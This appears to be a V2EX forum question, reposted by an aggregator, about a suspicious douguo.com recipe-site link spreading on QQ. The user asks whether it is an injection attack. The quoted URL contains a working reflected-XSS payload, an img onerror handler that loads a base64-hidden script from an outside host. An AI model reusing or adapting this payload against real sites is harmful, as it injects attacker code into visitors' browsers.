V2EX 18小时前
[问与答] 这是什么套路?是注入攻击还是伪装非法业务?
index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html

 

一食谱网站链接在QQ传播,疑涉及非法业务,引发安全担忧。需调查是否为网站注入攻击或恶意链接。

www.douguo.com 从这里进去是正常的食谱网站

https://m-pr.douguo.com/caipu/%E7%89%9B%E8%82%89?f=xss%22%3E%3Cimg%20src=x%20onerror=%22s=document.createElement(%27script%27);s.src=atob(%27Ly9zY3JpcHQudGlhbmppbmdjYWkuY24vMi5qcw==%27);document.body.appendChild(s)%22%3E&d=DxsAHxlTTkIOAkZBHQdPDgMBWgICBwQfSQwaQAcYVB1VBw1AIAYwJ1A8Ny0lRlBaUlxDV15ZUVRUV0FBAh0MAQ%3D%3D&qq_aio_chat_type=-1

在 qq 里发送这个链接就是类似涉黄约炮客服?

这到底是在正常网络业务里携带非法业务,还是网站被注入攻击了?

Fish AI Reader

Fish AI Reader

AI辅助创作,多种专业模板,深度分析,高质量内容生成。从观点提取到深度思考,FishAI为您提供全方位的创作支持。新版本引入自定义参数,让您的创作更加个性化和精准。

FishAI

FishAI

鱼阅,AI 时代的下一个智能信息助手,助你摆脱信息焦虑

联系邮箱 441953276@qq.com

相关标签

食谱网站 非法业务 网站安全
相关文章